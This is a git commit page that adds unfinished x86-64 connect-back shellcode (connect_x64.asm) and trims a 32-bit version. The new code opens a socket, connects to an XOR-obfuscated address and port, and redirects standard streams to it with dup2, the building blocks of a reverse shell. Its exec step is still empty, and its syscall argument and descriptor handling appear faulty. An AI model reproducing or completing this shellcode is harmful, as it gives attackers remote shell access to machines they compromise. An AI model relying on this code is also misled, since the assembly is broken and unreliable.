author | toni <toni@devlap.local> | 2015-04-13 17:33:25 +0200 |
committer | toni <toni@devlap.local> | 2015-04-13 17:33:25 +0200 |
commit | 2178934df6bbf584f9843b5ad955309bf409195c (patch) | |
tree | 76302b041aeebb03a1ebf358efeba944629a650e | |
parent | de17c3e7e1f412dc39b1e9b08ab735dc14a9faaa (diff) |
x86-64 connect shellcode
-rw-r--r-- | shellcode/connect.asm | 6 | ||||
-rw-r--r-- | shellcode/connect_x64.asm | 50 |
2 files changed, 50 insertions, 6 deletions
diff --git a/shellcode/connect.asm b/shellcode/connect.asm
index 3464a3e..fe5002a 100644
--- a/shellcode/connect.asm
+++ b/shellcode/connect.asm
@@ -58,9 +58,3 @@ mov ebx,esp ; arg
 mov byte [esp + 8], al ; null-terminate the string
 mov al,0xb ; execve syscall
 int 0x80
-
-; exit()
-mov al,0x1 ; exit syscall
-xor ebx,ebx
-mov bl,0x42 ; return code
-int 0x80 ; kernel mode
diff --git a/shellcode/connect_x64.asm b/shellcode/connect_x64.asm
new file mode 100644
index 0000000..a8e2ffa
--- /dev/null
+++ b/shellcode/connect_x64.asm
@@ -0,0 +1,50 @@
+BITS 64
+
+
+; socket()
+xor rax,rax ; zero out rax (SYSCALL NMB)
+;xor rdi,rdi ; " " rdi (ARG0)
+;xor rsi,rsi ; " " rsi (ARG1)
+;xor rdx,rdx ; " " rdx (ARG2)
+mov rdx,rax
+mov byte al,41 ; socketcall syscall
+;mov byte dil,0x1 ; SOCKTYPE
+;mov byte sil,0x2 ; SOCKDOMAIN
+;mov byte dl,0x0 ; PROTOCOL
+mov rdi,0x1
+mov rsi,0x2
+syscall
+
+; connect()
+mov al,42
+mov rdi,rax
+xor rax,rax
+push 0x1011116E ; XOR-encoded -> 127.0.0.1
+xor dword [rsp],0x11111111
+push word 0x2814 ; push tcp port (XOR-encoded -> 1337)
+xor word [rsp],0x1111 ; decode tcp port
+push word 0x2 ; 0x2 -> AF_INET
+mov rsi,rsp
+mov dl,0x10
+syscall
+
+; dup2()
+mov al,33
+mov rbx,rdi
+xor rdi,rdi
+xor rsi,rsi
+xor rcx,rcx ; zero out count register
+mov cl,0x3 ; loopcount
+dupes:
+xor eax,eax ; zero out eax
+mov al,33 ; dup2() syscall
+dec cl
+mov rdi,rcx
+mov rsi,rbx
+syscall
+inc cl
+loop dupes
+
+; exec()
+
+; exit()